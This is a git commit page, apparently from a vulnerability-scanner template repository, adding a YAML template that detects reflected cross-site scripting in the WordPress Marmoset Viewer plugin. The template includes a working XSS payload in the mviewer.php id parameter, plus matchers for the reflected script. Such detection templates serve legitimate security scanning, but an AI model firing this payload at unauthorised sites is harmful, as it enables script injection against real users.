Add Marmoset Viewer XSS Vulnerability
Reference: https://wordpress.org/plugins/marmoset-viewer/#developerspatch-1
parent
96fc7bb341
commit
d2df3303c6
|
@ -0,0 +1,22 @@
|
|||
id: wp-plugin-marmoset-viewer-xss
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Marmoset Viewer XSS
|
||||
author: johnjhacking
|
||||
severity: medium
|
||||
tags: xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27hacked%27)>"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "</script><svg/onload=alert('hacked')>"
|
||||
part: body
|
Loading…
Reference in New Issue